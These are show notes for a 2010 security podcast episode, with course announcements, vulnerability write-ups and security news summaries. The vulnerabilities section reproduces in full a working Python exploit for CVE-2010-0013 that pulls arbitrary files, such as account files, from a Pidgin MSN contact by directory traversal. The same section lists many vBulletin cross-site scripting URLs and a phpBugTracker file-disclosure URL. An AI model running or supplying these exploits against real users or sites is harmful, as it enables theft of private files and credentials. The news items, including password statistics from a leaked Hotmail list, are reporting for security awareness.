ISD Podcast Episode 72 for February 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191
Data Recovery Class April 12th to the 16th in Washington DC goto MyHardDriveDied.com or email smoulton at nicservices dot com for more information.
The next dc404 meeting will be at Outerzone near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
March 15 – 20, 2010 SANS Audit 507: Auditing Networks, Perimeter and Systems (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)
April 15 – 21, 2010 SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression (TM) (http://www.sans.org/atlanta-security-leadership-2010-cs)
May 17 – 21, 2010 SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth (http://www.sans.org/atlanta-critical-controls-2010-cs)
Vulnerabilities of Interest:
- Libpurple is subject to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. Versions prior to Libpurple 2.6.5 are vulnerable.
#!/usr/bin/env python
“”"
Pidgin MSN <= 2.6.4 file download vulnerability
Mathieu GASPARD (gaspmat@gmail.com)Description:
Pidgin is a multi-protocol Instant Messenger.This is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi.
The issue is caused by an error in the MSN custom smiley feature when processing emoticon requests,
which could allow attackers to disclose the contents of arbitrary files via directory traversal attacks.Affected versions :
Pidgin <= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library.
Plugin msn-pecan 0.1.0-rc2 (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to datePlateforms :
Windows, Linux, MacFix :
Fixed in Pidgin 2.6.5
Update to the latest version : http://www.pidgin.im/download/References :
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013
[2] http://www.pidgin.im/news/security/?id=42Usage :
You need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn
python pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l]Example :
# python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml]***********************************************************
Pidgin MSN file download vulnerability (CVE-2010-0013)
Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]
***********************************************************
Please enter the password for the account “foo@hotmail.com”
Password:
[+] Connecting to server
[+] Authentication in progress
[+] Synchronisation in progress
[+] OK, all done, ready to proceed
[+] Sending request for file “../accounts.xml” to “victim@hotmail.com”
[+] Using session_id 974948028
Current : 3606, total: 3881 (92%)
[+] Got an answer from the contact
—————-
<?xml version=’1.0′ encoding=’UTF-8′ ?><account version=’1.0′>
……..
“”"import warnings
warnings.simplefilter(“ignore”,DeprecationWarning)
import os
import sys
try:
import pymsn
except ImportError:
print “Pymsn couldn’t be loaded”
print “On debian-like systems, the package is python-msn”
sys.exit(-1)
import gobject
import logging
import getpass
import hashlib
from optparse import OptionParser
import signal
import timeSERVER_ADDRESS = ‘messenger.hotmail.com’
SERVER_PORT = 1863
FD_OUT = sys.stdout
MAINLOOP = None
# seconds after which, if we didn’t get an answer, we quit
TIMEOUT = 5global_client = None
def quit():
MAINLOOP.quit()
sys.exit(0)def check_if_succeeds():
# if False, we didn’t get a chunk so we won’t get any file, so we quit
if global_client.GOT_CONTROL_BLOB == False:
print “[+] Didn’t get an answer from the client after %d seconds, it’s likely not vulnerable or the file requested doesn’t exist/is not accessible”%TIMEOUT
print “[+] Exiting”
global_client.quit()# called when we get the result data, after our request
def handle_answer(object, client):
print “\n[+] Got an answer from the contact”
d = object._data
data = d.read()
length = len(data)
FD_OUT.write(data)
# if we wrote output to stdout, don’t close it
if FD_OUT != sys.stdout:
FD_OUT.close()
print “[+] Wrote %d bytes to file”%length
client.end = time.time()
duration = client.end – client.begin
print “[+] Download lasted %d seconds at %d bytes/s “%(duration,(length/duration))
client.quit()def my_on_chunk_recv(transport, chunk):
global_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk)
session_id = chunk.header.session_id
blob_id = chunk.header.blob_id
if session_id == global_client.session_id:
# first blob is control, we “squeeze” it and keep only the second one
if global_client.GOT_CONTROL_BLOB == False:
#print “Got Control blob in our connection (session_id : %d, blob_id: %d)”%(session_id, blob_id)
global_client.GOT_CONTROL_BLOB = True
else:
# if connections is complete, session_id is removed from data_blobs so we have to check before accessing it
if global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id):
current_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id]
print “Current : %d, total: %d (%d%%)\r”%(current_blob.current_size, current_blob.total_size, ((current_blob.current_size*100)/current_blob.total_size)),
sys.stdout.flush()def error_handler(self, error_type, error):
# __on_user_invitation_failed, probably because contact is offline/invisible
if error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \
error == pymsn.event.ContactInviteError.NOT_AVAILABLE:
print “[*] ERROR, contact didn’t accept our invite, probably because it is disconnected/invisible”
quit()
# __on_message_undelivered, probably because contact is offline/invisible
if error_type == pymsn.event.ConversationErrorType.MESSAGE and \
error == pymsn.event.MessageError.DELIVERY_FAILED:
print “[*] ERROR, couldn’t send message, probably because contact is disconnected/invisible”
quit()
print “[*] Unhandled error, error_type : %d , error : %d”%(error_type, error)
quit()class MyClient(pymsn.Client):
def __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection):
# callback to quit
self.quit = quit
# victim from whom we request the file
self.victim = victim
# just list contacts for this account
self.list_only = list_only
# file we request
self.filename = filename
# to calculate download duration and speed
self.begin = 0
self.end = 0
# session_id of the connection to retrieve the file
self.session_id = 0
# have we already seen the “control blob” for this connection
self.GOT_CONTROL_BLOB = False
pymsn.Client.__init__(self, server)
# REALLY REALLY HACKISH
# if contact is disconnected/invisible, a “NotImplementedError” exception is raised
# and it can’t be caught AFAIK so it needs to be redefined here
# handler_class should be SwitchboardClient
for handler_class, extra_args in self._switchboard_manager._handlers_class:
handler_class._on_error = error_handlerclass MyMSNObjectStore(pymsn.p2p.MSNObjectStore):
def __compute_data_hash(self, data):
digest = hashlib.sha1()
data.seek(0, 0)
read_data = data.read(1024)
while len(read_data) > 0:
digest.update(read_data)
read_data = data.read(1024)
data.seek(0, 0)
return digest.digest()# need to compute the SHA hash (SHAd in MSNObject) otherelse the function in MSNObjectStore complains because
# the hash of the data we receive is not the hash we expected (hash we expect is the one we send, which is always the same here)
def _outgoing_session_transfer_completed(self, session, data):
handle_id, callback, errback, msn_object = self._outgoing_sessions[session]
msn_object._data_sha = self.__compute_data_hash(data)
super(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data)class ClientEventHandler(pymsn.event.ClientEventInterface):
def on_client_error(self, error_type, error):
if error_type == pymsn.event.ClientErrorType.AUTHENTICATION:
print “[+] Authentication failed, bad login/password”
self._client.quit()
else:
print “[*] ERROR :”, error_type, ” ->”, errordef on_client_state_changed(self, state):
#print “State changed to %s” % state
if state == pymsn.client.ClientState.CLOSED:
print “[+] Connection to server closed”
self._client.quit()if state == pymsn.client.ClientState.CONNECTING:
if self.current_state != state:
print “[+] Connecting to server”
self.current_state = state
if state == pymsn.client.ClientState.AUTHENTICATING:
if self.current_state != state:
print “[+] Authentication in progress”
self.current_state = state
if state == pymsn.client.ClientState.SYNCHRONIZING:
if self.current_state != state:
print “[+] Synchronisation in progress”
self.current_state = stateif state == pymsn.client.ClientState.OPEN:
print “[+] OK, all done, ready to proceed”
self._client.profile.presence = pymsn.Presence.INVISIBLE
contact_dict = {}
for i in self._client.address_book.contacts:
contact_dict[i.account] = i
if self._client.list_only:
for (k,v) in contact_dict.items():
print k+” (“+v.display_name+”)”
self._client.quit()
else:
if self._client.victim not in contact_dict.keys():
print “[*] Error, contact %s not in your contact list”%self._client.victim
self._client.quit()
else:
contact = contact_dict[self._client.victim]
store = MyMSNObjectStore(self._client)
object = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, ‘AAA=’,’2jmj7l5rSw0yVb/vlWAYkK/YBwk=’)
print “[+] Sending request for file \”%s\” to \”%s\”"%(self._client.filename, self._client.victim)
self._client.begin = time.time()
store.request(object, [handle_answer, self._client])
# at this moment, we got only one session_id, the one we will use to request the file
for k in store._outgoing_sessions.keys():
print “[+] Using session_id %d”%k._id
self._client.session_id = k._id
# hack to set up my own callback each time we receive a chunk, used to print the percentage of the download
self._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received
self._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv
# if no file transfer received from the victim after TIMEOUT seconds, quit
gobject.timeout_add(TIMEOUT*1000, check_if_succeeds)def __init__(self, client):
self.current_state = None
pymsn.event.ClientEventInterface.__init__(self, client)if __name__ == ‘__main__’:
print “***********************************************************\n”
print “Pidgin MSN file download vulnerability (CVE-2010-0013)\n”
print “Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\n”
print “***********************************************************\n”usage = “Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] ”
parser = OptionParser(usage=usage)
parser.add_option(“-f”, “–file”, dest=”filename”, default=None,
help=”File requested to remote contact”)
parser.add_option(“-o”, “–output”, dest=”output_file”, default=None,
help=”Where to write received file, STDOUT otherelse”)
parser.add_option(“-a”, “–account”, dest=”account”, default=None,
help=”MSN account to use”)
parser.add_option(“-c”, “–contact”, dest=”contact”, default=None,
help=”Contact to request file from”)
parser.add_option(“-l”, “–list”, dest=”list_only”, action=”store_true”, default=False,
help=”Just print contact list for your account and exit”)(options, args) = parser.parse_args()
if not options.filename or not options.account or not options.contact:
if not (options.account and options.list_only):
print “Error, parameter missing”
parser.print_help()
sys.exit(-1)if options.output_file != None:
try:
FD_OUT = open(options.output_file,”wb”)
except Exception,e:
print “Cannot open file %s (%s)”%(options.output_file, e)
sys.exit(-1)MAINLOOP = gobject.MainLoop()
def sigterm_cb():
gobject.idle_add(quit)signal.signal(signal.SIGTERM, sigterm_cb)
logging.basicConfig(level=logging.CRITICAL) # allows us to see the protocol debug
server = (SERVER_ADDRESS, SERVER_PORT)
client = MyClient(server, quit, options.contact, options.filename, options.list_only)
global_client = client
client_events_handler = ClientEventHandler(client)
print “Please enter the password for the account \”%s\”"%options.account
try:
passwd = getpass.getpass()
except KeyboardInterrupt:
quit()login_info = (options.account, passwd)
client.login(*login_info)
try:
MAINLOOP.run()
except KeyboardInterrupt:
quit() - vBulletin is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. These issues affect vBulletin 4.0.2; other versions may also be affected. Example URLs:
http://www.sample.com/upload/calendar.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/faq.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/forum.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/usercp.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/subscription.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/showthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/showgroups.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/sendmessage.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/search.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/register.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/profile.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/private.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/online.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/newthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/misc.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/memberlist.php?=>”‘><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/member.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/inlinemod.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/index.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/forumdisplay.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt> - phpBugTracker is subject to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view local files in the context of the webserver process, which may aid in further attacks. This issue affects phpBugTracker 1.0.1; other versions may be vulnerable as well. Example URL: http://www.sample.com/[path]/attachment.php?filename=./config.php
News Items of Interest:
News item 1: http://www.allaboutjazz.com/php/news.php?id=50220
A band of hackers who were recently discovered hoarding a trove of account logons pilfered from thousands of companies worldwide are garden-variety cyberthieves. The gang most likely began by hiring spam specialists to send out e- mail and social- networking posts to lure recipients into clicking on a tainted Web link. They then used a dated free version of a hacking tool called ZeuS and did nothing to hide their tracks, indicating that “they’re probably amateurs.”
This underscores how deeply cybercriminals — from novices to elite gangs — have now saturated the Internet with infections that allow them to take full control of Windows PCs. Cybergangs slot newly infected PCs, called bots, into networks called botnets. On any given day, 12% to 15% of the 1.6 billion computers connected to the Internet are bots, according to security firm Damballa.
News item 2: http://www.suntimes.com/entertainment/music/2059068,freeallmusic-guvera-music-sites-022010.article
Two new companies are giving consumers a way to download songs for free by watching a few ads. The idea has been tried before but this time it appears it might work, because the startups have found advertisers that are willing to pay around $2 to have a moment of your time.
That means recording companies can get about as much compensation from the free services as they receive from a download on iTunes that costs the consumer $1.29.
“You pay for the song by paying attention to the advertiser,” said Richard Nailling, CEO of FreeAllMusic.com, which launched an invitation-only test of its service in December. “It’s a fair trade of attention for music.”
Both Free All Music and another new free site, Guvera.com, have licensing deals with independent labels and two of the largest recording companies, Universal Music Group and EMI Group PLC. Fans of U2, Black Eyed Peas and Norah Jones should be happy. But admirers of Ke$ha or Sade, both with Sony Music labels, will be out of luck for now.
The new services come after years of falling CD sales. More people are consuming music online but spending far less for it.
In response, recording companies have been licensing songs to an array of Internet businesses that offer songs cheaply or for free — in the hope that these legitimate alternatives can keep people from turning to illegal downloads.
News item 3: http://www.acunetix.com/blog/websecuritynews/statistics-from-10000-leaked-hotmail-passwords/
An anonymous user posted usernames and passwords of over 10,000 Windows Live Hotmail accounts to a web site called PasteBin. PasteBin is currently down for maintenance but I managed to get a copy of the list, and quickly generated some statistics from these passwords.
Below are the statistics:
- The list initially contained 10,028 entries.
- After I’ve cleaned up the list, like removing entries without a password, I had 9843 valid entries (passwords).
- There are 8931 (90%) unique passwords in the list.
- The longest password was 30 chars long: lafaroleratropezoooooooooooooo.
- The shortest password was 1 char long : )
Top 20 most common passwords:
- 123456 – 64
- 123456789 – 18
- alejandra – 11
- 111111 – 10
- alberto – 9
- tequiero – 9
- alejandro – 9
- 12345678 – 9
- 1234567 – 8
- estrella – 7
- iloveyou - 7
- daniel - 7
- 000000 - 7
- roberto - 7
- 654321 - 6
- bonita - 6
- sebastian - 6
- beatriz - 6
- mariposa - 5
- america - 5
Based on these passwords I think the phishing kit was targeted towards the Latino community.
Password length distribution:
- 1 chars – 2 – 0 %
- 2 chars – 4 – 0 %
- 3 chars – 4 – 0 %
- 4 chars – 31 – 0 %
- 5 chars – 49 – 1 %
- 6 chars – 1946 – 22 %
- 7 chars – 1254 – 14 %
- 8 chars – 1838 – 21 %
- 9 chars – 1091 – 12 %
- 10 chars – 772 – 9 %
- 11 chars – 527 – 6 %
- 12 chars – 431 – 5 %
- 13 chars – 290 – 3 %
- 14 chars – 219 – 2 %
- 15 chars – 157 – 2 %
- 16 chars – 190 – 2 %
- 17 chars – 56 – 1 %
- 18 chars – 17 – 0 %
- 19 chars – 7 – 0 %
- 20 chars – 14 – 0 %
- 21 chars – 10 – 0 %
- 22 chars – 8 – 0 %
- 23 chars – 3 – 0 %
- 24 chars – 3 – 0 %
- 25 chars – 3 – 0 %
- 26 chars – 0 – 0 %
- 27 chars – 3 – 0 %
- 28 chars – 0 – 0 %
- 29 chars – 1 – 0 %
- 30 chars – 1 – 0 %
As you can see from the list above, most of the passwords are between 6 and 9 characters long. Average password length is 8 characters.
What kind of passwords were in the list? :
- 3,713 = 42 %; lower alpha passwords : passwords containing only characters from ‘a’ to ‘z’.
Example : iloveyou - 291 = 3 %; mixed case alpha passwords : passwords containing characters from ‘a’ to ‘z’ and from ‘A’ to ‘Z’.
Example: ILoveYou - 1707 = 19 %; numeric passwords: passwords containing only numbers (‘0′ to ‘9′)
Example: 123456 - 2655 = 30 %; mixed alpha and numeric passwords: passwords containing characters from ‘a’-’z’, ‘A’-’Z’ and ‘0′-’9′.
Example: Iloveyou12 - 565 = 6 %; mixed alpha + numeric + other characters.
Example: 1Love You$%@
News item 4: http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=223000208
Emerging botnet could redirect users to data-stealing sites, researchers say. Czech security experts say they have uncovered a global botnet that may be redirecting Web surfers to other sites for the purpose of stealing their data.
Jan Vykopal, head of the security project of Masaryk University, told the Czech news agency CTK earlier this week that the Czech Defense Ministry discovered the botnet during a project called CYBER, in which several agencies have been researching ways to improve the country’s cyber defenses.
The botnet’s creators have dubbed the network “Chuck Norris” after the famous Hollywood actor and martial arts expert.
Researchers told the CTK that the botnet could allow operators to breach sensitive user data, such as access details for bank accounts, email boxes, passwords to various services, social networks, and other personal data.
The botnet could conceivably be used for attacks on well-secured servers, as well, Vykopal said, but the researchers are uncertain of how many devices it has martialed.
News item 5: http://www.eweek.com/c/a/Security/FBI-Investigates-Webcam-Spy-Allegations-Against-School-451724/
The FBI is investigating allegations made against the Lower Merion School District in a lawsuit by the parents of a student. The lawsuit claims school officials used a remote-controlled Webcam to spy on their son, a high school student.
The FBI is reportedly investigating a Pennsylvaniaschool district for possible federal law violations in light of a lawsuit filed by the parents of a high school student.
News item 6: http://www.youtube.com/watch?v=QoqRR_J9ORc%20rel=
I have a lot of interest in the naughtiness of the web and even if it just so happens that an attractive young woman going by the unusual name of “Numbers Anacker” (user id Man17782) that has never posted a single item to my site, I might be likely to follow her. As would more and more folks (some of whom are following her back – presumably because they are intrigued by her photograph). As the following YouTube video demonstrates, this appears to be an attempt to get people to sign-up for a website that offers to find adults new sexual partners.
News item 7: http://www.shadyurl.com/
Link shortening has become a commonplace on services like Facebook and Twitter. Heck, even Google shortens URLs within its products now. People seem to be getting more used to the idea that shortened URLs, despite not showing you where they lead, are safe. Part of that, is that the companies that are doing the shortening keep blacklists of sites with malware or spyware, to keep people from accidentally visiting sites that will do harm.
Newcomer ShadyURL makes no such claims though. This wonderfully satirical service turns even legitimate URLs into something that even the least tech-savvy friend or family member would know better than to click on. It inserts anything from what appear to be hijacking commands, to profanity and the names of well-known malware. In other words, whomever you send one of these links to is likely to say “there’s no way I’m clicking on that,” even though it’s likely to lead to a safe site.
Here are some of the gems it spit out on some common sites:
Facebook.com became: http://5z8.info/inject_worm_w0x6_open.exe
Twitter.com became: http://5z8.info/hack-outlook_z6t4_warez
